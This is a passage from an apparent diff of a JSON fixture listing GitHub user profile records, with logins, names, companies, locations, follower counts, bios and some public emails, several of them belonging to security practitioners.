0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-04-05T05:59:26Z", + "updated_at": "2024-09-01T02:05:19Z", + "node_id": "MDQ6VXNlcjgxOTQ5OTAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 56, + "fields": { + "nest_created_at": "2024-09-11T19:26:10.295Z", + "nest_updated_at": "2024-09-16T19:55:05.432Z", + "name": "", + "login": "renovate[bot]", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/in/2740?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-06-02T07:04:12Z", + "updated_at": "2017-06-14T20:22:02Z", + "node_id": "MDM6Qm90MjkxMzk2MTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 57, + "fields": { + "nest_created_at": "2024-09-11T19:26:14.301Z", + "nest_updated_at": "2024-09-22T20:29:04.979Z", + "name": "", + "login": "ThunderSon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32433575?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 176, + "public_gists_count": 1, + "public_repositories_count": 47, + "created_at": "2017-10-01T13:27:20Z", + "updated_at": "2024-07-05T22:54:41Z", + "node_id": "MDQ6VXNlcjMyNDMzNTc1", + "bio": "Application Security Engineer.\r\nWSTG project lead.\r\nIntegration Standard project lead.", + "is_hireable": false, + "twitter_username": "7hunderson" + } +}, +{ + "model": "github.user", + "pk": 58, + "fields": { + "nest_created_at": "2024-09-11T19:26:40.951Z", + "nest_updated_at": "2024-09-22T15:45:14.275Z", + "name": "", + "login": "BOOBALANMR14", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93393514?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-10-29T15:02:10Z", + "updated_at": "2024-08-26T12:36:36Z", + "node_id": "U_kgDOBZESag", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 59, + "fields": { + "nest_created_at": "2024-09-11T19:28:09.558Z", + "nest_updated_at": "2024-09-22T18:43:35.766Z", + "name": "Daniel Neagaru", + "login": "danielonsecurity", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65662675?v=4", + "company": "@DigeeX ", + "location": "Hamburg", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-05-20T12:37:25Z", + "updated_at": "2024-03-08T11:29:56Z", + "node_id": "MDQ6VXNlcjY1NjYyNjc1", + "bio": "IT security enthusiast, trying to help build a safer Internet.\r\n", + "is_hireable": false, + "twitter_username": "digeex_security" + } +}, +{ + "model": "github.user", + "pk": 60, + "fields": { + "nest_created_at": "2024-09-11T19:28:41.454Z", + "nest_updated_at": "2024-09-22T18:43:36.098Z", + "name": "Gwisin Koht", + "login": "gwisinkoht", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84480419?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-05-19T22:26:01Z", + "updated_at": "2023-11-17T20:15:08Z", + "node_id": "MDQ6VXNlcjg0NDgwNDE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 61, + "fields": { + "nest_created_at": "2024-09-11T19:30:30.852Z", + "nest_updated_at": "2024-09-22T20:21:50.920Z", + "name": "Spyros", + "login": "northdpole", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1583262?v=4", + "company": "https://smithy.security", + "location": "Knowhere", + "collaborators_count": 0, + "following_count": 77, + "followers_count": 73, + "public_gists_count": 11, + "public_repositories_count": 46, + "created_at": "2012-03-28T12:30:20Z", + "updated_at": "2024-09-18T09:12:19Z", + "node_id": "MDQ6VXNlcjE1ODMyNjI=", + "bio": "Founder @https://smithy.security -- security workflow automation,\r\n\r\nmaintainer of OpenCRE -- https://opencre.org", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 62, + "fields": { + "nest_created_at": "2024-09-11T19:30:40.864Z", + "nest_updated_at": "2024-09-22T19:24:55.855Z", + "name": "Mees", + "login": "Meess", + "email": "meeskalf@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8512566?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-08-21T10:17:56Z", + "updated_at": "2024-07-26T13:54:48Z", + "node_id": "MDQ6VXNlcjg1MTI1NjY=", + "bio": "I see code", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 63, + "fields": { + "nest_created_at": "2024-09-11T19:30:42.888Z", + "nest_updated_at": "2024-09-22T20:30:52.410Z", + "name": "Björn Kimminich", + "login": "bkimminich", + "email": "github.com@kimminich.de", + "avatar_url": "https://avatars.githubusercontent.com/u/3531020?v=4", + "company": "@kuehne-nagel", + "location": "Hamburg, Germany", + "collaborators_count": 0, + "following_count": 215, + "followers_count": 1092, + "public_gists_count": 5, + "public_repositories_count": 103, + "created_at": "2013-02-11T10:08:16Z", + "updated_at": "2024-09-09T07:19:10Z", + "node_id": "MDQ6VXNlcjM1MzEwMjA=", + "bio": "IT Product Group Lead @kuehne-nagel, Project Leader @OWASP @juice-shop", + "is_hireable": false, + "twitter_username": "bkimminich" + } +}, +{ + "model": "github.user", + "pk": 64, + "fields": { + "nest_created_at": "2024-09-11T19:30:49.561Z", + "nest_updated_at": "2024-09-11T19:30:49.562Z", + "name": "Flo", + "login": "flowirtz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6052785?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 114, + "followers_count": 80, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2013-11-27T18:55:08Z", + "updated_at": "2024-08-26T11:26:44Z", + "node_id": "MDQ6VXNlcjYwNTI3ODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "flowirtz" + } +}, +{ + "model": "github.user", + "pk": 65, + "fields": { + "nest_created_at": "2024-09-11T19:31:13.258Z", + "nest_updated_at": "2024-09-22T19:48:02.845Z", + "name": "Dimitar Raichev", + "login": "DRaichev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52790026?v=4", + "company": "", + "location": "Sofia, Bulgaria", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-07-11T13:49:54Z", + "updated_at": "2024-07-23T09:51:29Z", + "node_id": "MDQ6VXNlcjUyNzkwMDI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 66, + "fields": { + "nest_created_at": "2024-09-11T19:31:16.567Z", + "nest_updated_at": "2024-09-11T19:31:16.567Z", + "name": "Alex", + "login": "stateandprove", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80955529?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2021-03-19T10:34:13Z", + "updated_at": "2024-09-02T22:18:57Z", + "node_id": "MDQ6VXNlcjgwOTU1NTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 67, + "fields": { + "nest_created_at": "2024-09-11T19:31:22.262Z", + "nest_updated_at": "2024-09-22T19:48:00.599Z", + "name": "Aram Hovsepyan", + "login": "aramhovsepyan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25081340?v=4", + "company": "Codific", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2017-01-12T14:06:13Z", + "updated_at": "2024-09-11T13:32:16Z", + "node_id": "MDQ6VXNlcjI1MDgxMzQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 68, + "fields": { + "nest_created_at": "2024-09-11T19:31:23.531Z", + "nest_updated_at": "2024-09-11T19:31:23.531Z", + "name": "", + "login": "cr-axway", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49165141?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-04-01T17:18:56Z", + "updated_at": "2024-02-06T16:05:16Z", + "node_id": "MDQ6VXNlcjQ5MTY1MTQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 69, + "fields": { + "nest_created_at": "2024-09-11T19:31:26.573Z", + "nest_updated_at": "2024-09-11T19:31:26.573Z", + "name": "Ollie Cuffley-Hur", + "login": "olcuhu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10589589?v=4", + "company": "ControlPlane", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2015-01-19T01:10:47Z", + "updated_at": "2024-08-12T12:58:34Z", + "node_id": "MDQ6VXNlcjEwNTg5NTg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 70, + "fields": { + "nest_created_at": "2024-09-11T19:31:26.965Z", + "nest_updated_at": "2024-09-22T19:24:55.229Z", + "name": "Diana", + "login": "dlicheva", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8710269?v=4", + "company": "Ocurity", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-09-09T13:48:25Z", + "updated_at": "2024-09-04T13:04:57Z", + "node_id": "MDQ6VXNlcjg3MTAyNjk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 71, + "fields": { + "nest_created_at": "2024-09-11T19:31:29.145Z", + "nest_updated_at": "2024-09-22T19:24:54.599Z", + "name": "John Harvey", + "login": "john681611", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10814889?v=4", + "company": "@MongoDB", + "location": "London", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 69, + "created_at": "2015-02-02T17:20:12Z", + "updated_at": "2024-08-12T16:30:43Z", + "node_id": "MDQ6VXNlcjEwODE0ODg5", + "bio": "Senior Software Engineer,\r\nMaintainer of Briefing Room for DCS,\r\nArmA 3 Mission/Script Developer\r\n\r\nI don't hide my messy/half-arsed project", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 72, + "fields": { + "nest_created_at": "2024-09-11T19:31:36.278Z", + "nest_updated_at": "2024-09-11T19:31:36.278Z", + "name": "Yavor Kolev", + "login": "javorkolev123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23657555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2016-11-22T13:05:24Z", + "updated_at": "2024-09-11T10:24:29Z", + "node_id": "MDQ6VXNlcjIzNjU3NTU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 73, + "fields": { + "nest_created_at": "2024-09-11T19:31:48.103Z", + "nest_updated_at": "2024-09-22T19:24:52.915Z", + "name": "", + "login": "5t00g1t", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29344572?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-06-10T22:36:08Z", + "updated_at": "2024-08-22T16:06:11Z", + "node_id": "MDQ6VXNlcjI5MzQ0NTcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 74, + "fields": { + "nest_created_at": "2024-09-11T19:31:56.825Z", + "nest_updated_at": "2024-09-18T17:40:06.018Z", + "name": "Charif Mahmoudi", + "login": "charifmahmoudi", + "email": "charif.mahmoudi@siemens.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6098664?v=4", + "company": "Siemens Corporate Techmology", + "location": "Princeton NJ", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2013-12-03T19:56:36Z", + "updated_at": "2024-09-17T02:28:39Z", + "node_id": "MDQ6VXNlcjYwOTg2NjQ=", + "bio": "Dr. Charif Mahmoudi received the MSc and PhD degrees in computer engineering from the University of Paris-EST (France) in 2009 and 2014, respectively.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 75, + "fields": { + "nest_created_at": "2024-09-11T19:32:01.926Z", + "nest_updated_at": "2024-09-22T15:47:45.370Z", + "name": "Smita", + "login": "SMITA-ME", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89657173?v=4", + "company": "GTU - GSET", + "location": "Ahemdabad, Gujarat", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2021-08-27T17:10:00Z", + "updated_at": "2022-02-15T07:18:57Z", + "node_id": "MDQ6VXNlcjg5NjU3MTcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 76, + "fields": { + "nest_created_at": "2024-09-11T19:32:27.174Z", + "nest_updated_at": "2024-09-22T17:39:35.488Z", + "name": "Michael Bargury", + "login": "mbrg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11074433?v=4", + "company": "@zenitysec", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 143, + "public_gists_count": 3, + "public_repositories_count": 78, + "created_at": "2015-02-19T12:33:40Z", + "updated_at": "2024-09-21T22:35:45Z", + "node_id": "MDQ6VXNlcjExMDc0NDMz", + "bio": "Hacking, AppSec, crypto and low-code/no-code | Co-founder & CTO at Zenity, lead OWASP No Code, Ex MSFT security", + "is_hireable": false, + "twitter_username": "mbrg0" + } +}, +{ + "model": "github.user", + "pk": 77, + "fields": { + "nest_created_at": "2024-09-11T19:32:27.582Z", + "nest_updated_at": "2024-09-11T19:32:27.582Z", + "name": "", + "login": "johndtgroup", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/127353582?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-03-08T21:53:08Z", + "updated_at": "2023-03-08T21:53:08Z", + "node_id": "U_kgDOB5dC7g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 78, + "fields": { + "nest_created_at": "2024-09-11T19:32:30.172Z", + "nest_updated_at": "2024-09-22T15:48:14.463Z", + "name": "Yianna Paris", + "login": "nekosoft", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24336984?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2016-12-03T04:17:52Z", + "updated_at": "2024-08-09T14:17:58Z", + "node_id": "MDQ6VXNlcjI0MzM2OTg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 79, + "fields": { + "nest_created_at": "2024-09-11T19:35:23.239Z", + "nest_updated_at": "2024-09-22T15:51:31.604Z", + "name": "Takahiro Yoshimura", + "login": "alterakey", + "email": "altakey@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/303596?v=4", + "company": "Monolith Works Inc.", + "location": "Japan", + "collaborators_count": 0, + "following_count": 42, + "followers_count": 52, + "public_gists_count": 65, + "public_repositories_count": 49, + "created_at": "2010-06-12T15:18:56Z", + "updated_at": "2024-09-20T03:02:14Z", + "node_id": "MDQ6VXNlcjMwMzU5Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "alterakey" + } +}, +{ + "model": "github.user", + "pk": 80, + "fields": { + "nest_created_at": "2024-09-11T19:35:34.619Z", + "nest_updated_at": "2024-09-22T15:51:44.649Z", + "name": "Markus", + "login": "CodeDrop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19193743?v=4", + "company": "", + "location": "Munich", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-05-04T18:49:42Z", + "updated_at": "2024-08-22T17:51:38Z", + "node_id": "MDQ6VXNlcjE5MTkzNzQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 81, + "fields": { + "nest_created_at": "2024-09-11T19:36:11.421Z", + "nest_updated_at": "2024-09-11T19:36:11.421Z", + "name": "Jean Novak", + "login": "jeannovak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42330295?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-08-13T02:42:13Z", + "updated_at": "2023-04-17T03:45:06Z", + "node_id": "MDQ6VXNlcjQyMzMwMjk1", + "bio": "Bronze medalist at WorldSkills 2019 - Cybersecurity", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 82, + "fields": { + "nest_created_at": "2024-09-11T19:36:13.110Z", + "nest_updated_at": "2024-09-22T19:23:11.676Z", + "name": "Michael Jones", + "login": "mikeacjones", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25686778?v=4", + "company": "", + "location": "Atlanta, GA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 21, + "public_gists_count": 23, + "public_repositories_count": 64, + "created_at": "2017-02-10T12:22:05Z", + "updated_at": "2024-08-20T12:02:53Z", + "node_id": "MDQ6VXNlcjI1Njg2Nzc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 83, + "fields": { + "nest_created_at": "2024-09-11T19:36:16.411Z", + "nest_updated_at": "2024-09-11T19:36:16.411Z", + "name": "Ralph Adame", + "login": "radame2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47871416?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-02-21T22:17:39Z", + "updated_at": "2024-03-02T17:48:49Z", + "node_id": "MDQ6VXNlcjQ3ODcxNDE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 84, + "fields": { + "nest_created_at": "2024-09-11T19:36:18.067Z", + "nest_updated_at": "2024-09-22T19:23:11.990Z", + "name": "Jayesh Bapu Ahire", + "login": "JBAhire", + "email": "jayeshbahire@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26570044?v=4", + "company": "@Traceableai, @hypertrace", + "location": "Pune, India", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 85, + "public_gists_count": 2, + "public_repositories_count": 84, + "created_at": "2017-03-21T10:42:43Z", + "updated_at": "2024-08-28T11:50:22Z", + "node_id": "MDQ6VXNlcjI2NTcwMDQ0", + "bio": "Product | Security & Observability 🥑 | Author | AWS Machine Learning Hero | @twilio champion | Community organizer @aws @elastic @microsoft @tensorflow |", + "is_hireable": true, + "twitter_username": "Jayesh_Ahire1" + } +}, +{ + "model": "github.user", + "pk": 85, + "fields": { + "nest_created_at": "2024-09-11T19:36:18.477Z", + "nest_updated_at": "2024-09-11T19:36:18.477Z", + "name": "Dhruv Singhal", + "login": "dhruv-singhal-github", + "email": "f20170765@pilani.bits-pilani.ac.in", + "avatar_url": "https://avatars.githubusercontent.com/u/39822483?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2018-06-01T07:07:00Z", + "updated_at": "2024-06-24T17:12:24Z", + "node_id": "MDQ6VXNlcjM5ODIyNDgz", + "bio": "Perfectly balanced, as all things should be.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 86, + "fields": { + "nest_created_at": "2024-09-11T19:36:20.562Z", + "nest_updated_at": "2024-09-11T19:36:20.562Z", + "name": "Alok Hegde", + "login": "alok1929", + "email": "alokhegde221@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/51386198?v=4", + "company": "", + "location": "Bangalore,India", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 84, + "created_at": "2019-06-04T22:04:11Z", + "updated_at": "2024-09-07T07:19:10Z", + "node_id": "MDQ6VXNlcjUxMzg2MTk4", + "bio": "blogger | web dev | aiml |\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 87, + "fields": { + "nest_created_at": "2024-09-11T19:36:23.012Z", + "nest_updated_at": "2024-09-11T19:36:23.012Z", + "name": "Yash Baban Salve", + "login": "YashSalve695", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71492690?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2020-09-18T08:58:50Z", + "updated_at": "2023-12-22T05:28:54Z", + "node_id": "MDQ6VXNlcjcxNDkyNjkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 88, + "fields": { + "nest_created_at": "2024-09-11T19:36:23.426Z", + "nest_updated_at": "2024-09-11T19:36:23.426Z", + "name": "Ayush Sharma", + "login": "ayushthe1", + "email": "ayushsharmaa101@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/114604338?v=4", + "company": "FealtyX", + "location": "India", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 31, + "public_gists_count": 1, + "public_repositories_count": 48, + "created_at": "2022-09-28T16:18:27Z", + "updated_at": "2024-08-03T05:12:44Z", + "node_id": "U_kgDOBtS5Mg", + "bio": "A curious learner who loves to collaborate \r\n \r\n | Go & DevOps enthusiast", + "is_hireable": false, + "twitter_username": "ayushthe5" + } +}, +{ + "model": "github.user", + "pk": 89, + "fields": { + "nest_created_at": "2024-09-11T19:36:26.336Z", + "nest_updated_at": "2024-09-22T19:23:15.192Z", + "name": "Ravisuriya Eswara", + "login": "testingGarage", + "email": "ravisuriya1@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9585769?v=4", + "company": "", + "location": "Bengaluru", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2014-11-06T05:56:42Z", + "updated_at": "2024-05-10T13:02:07Z", + "node_id": "MDQ6VXNlcjk1ODU3Njk=", + "bio": "Student of Software Testing | Software Test Engineer", + "is_hireable": false, + "twitter_username": "testingGarage" + } +}, +{ + "model": "github.user", + "pk": 90, + "fields": { + "nest_created_at": "2024-09-11T19:36:30.080Z", + "nest_updated_at": "2024-09-22T19:23:16.452Z", + "name": "Chahat Jain", + "login": "chahat99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42612949?v=4", + "company": "@Traceableai ", + "location": "Bangalore India", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-08-22T14:13:25Z", + "updated_at": "2023-05-31T10:39:08Z", + "node_id": "MDQ6VXNlcjQyNjEyOTQ5", + "bio": "SWE @Traceableai ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 91, + "fields": { + "nest_created_at": "2024-09-11T19:36:32.498Z", + "nest_updated_at": "2024-09-11T19:36:32.498Z", + "name": "", + "login": "afreen23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25664409?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 7, + "public_gists_count": 10, + "public_repositories_count": 62, + "created_at": "2017-02-09T13:43:08Z", + "updated_at": "2024-08-22T07:33:18Z", + "node_id": "MDQ6VXNlcjI1NjY0NDA5", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 92, + "fields": { + "nest_created_at": "2024-09-11T19:36:41.836Z", + "nest_updated_at": "2024-09-11T19:36:41.836Z", + "name": "", + "login": "wIngy123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111032533?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 308, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 57, + "created_at": "2022-08-11T02:37:30Z", + "updated_at": "2024-07-08T08:00:59Z", + "node_id": "U_kgDOBp441Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 93, + "fields": { + "nest_created_at": "2024-09-11T19:36:42.696Z", + "nest_updated_at": "2024-09-11T19:36:42.696Z", + "name": "Yao6911", + "login": "Yao6911", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61447785?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-02-25T06:03:15Z", + "updated_at": "2023-05-23T05:58:28Z", + "node_id": "MDQ6VXNlcjYxNDQ3Nzg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 94, + "fields": { + "nest_created_at": "2024-09-11T19:36:43.931Z", + "nest_updated_at": "2024-09-11T19:36:43.931Z", + "name": "", + "login": "Alexandru93s", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82706132?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2021-04-17T10:26:11Z", + "updated_at": "2024-08-26T07:19:04Z", + "node_id": "MDQ6VXNlcjgyNzA2MTMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 95, + "fields": { + "nest_created_at": "2024-09-11T19:36:45.194Z", + "nest_updated_at": "2024-09-11T19:36:45.194Z", + "name": "Denis Rossati", + "login": "denis-rossati", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74881282?v=4", + "company": "Croct", + "location": "", + "collaborators_count": 0, + "following_count": 137, + "followers_count": 102, + "public_gists_count": 0, + "public_repositories_count": 59, + "created_at": "2020-11-22T22:48:29Z", + "updated_at": "2024-07-28T02:35:10Z", + "node_id": "MDQ6VXNlcjc0ODgxMjgy", + "bio": "", + "is_hireable": true, + "twitter_username": "chubby_cows" + } +}, +{ + "model": "github.user", + "pk": 96, + "fields": { + "nest_created_at": "2024-09-11T19:36:46.695Z", + "nest_updated_at": "2024-09-11T19:36:46.695Z", + "name": "Dikshant Singh", + "login": "elit3pwner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95041015?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2021-11-25T15:30:20Z", + "updated_at": "2024-09-07T12:57:06Z", + "node_id": "U_kgDOBao19w", + "bio": "", + "is_hireable": false, + "twitter_username": "elit3pwner" + } +}, +{ + "model": "github.user", + "pk": 97, + "fields": { + "nest_created_at": "2024-09-11T19:36:47.957Z", + "nest_updated_at": "2024-09-22T15:31:15.703Z", + "name": "Hüseyin Gülşin", + "login": "huseyingulsin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20372673?v=4", + "company": "Radity", + "location": "İzmir", + "collaborators_count": 0, + "following_count": 73, + "followers_count": 86, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2016-07-09T16:36:18Z", + "updated_at": "2024-09-13T13:10:05Z", + "node_id": "MDQ6VXNlcjIwMzcyNjcz", + "bio": "cyber security engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 98, + "fields": { + "nest_created_at": "2024-09-11T19:36:49.670Z", + "nest_updated_at": "2024-09-11T19:36:49.670Z", + "name": "", + "login": "mxm-smaler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85622527?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-06-09T12:00:42Z", + "updated_at": "2023-11-04T07:36:54Z", + "node_id": "MDQ6VXNlcjg1NjIyNTI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 99, + "fields": { + "nest_created_at": "2024-09-11T19:36:51.014Z", + "nest_updated_at": "2024-09-11T19:36:51.014Z", + "name": "P4R4D0X", + "login": "P4R4D0X-HACKS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81650164?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-03-30T19:49:23Z", + "updated_at": "2024-09-06T18:35:58Z", + "node_id": "MDQ6VXNlcjgxNjUwMTY0", + "bio": "I am a budding hacker who wants to share 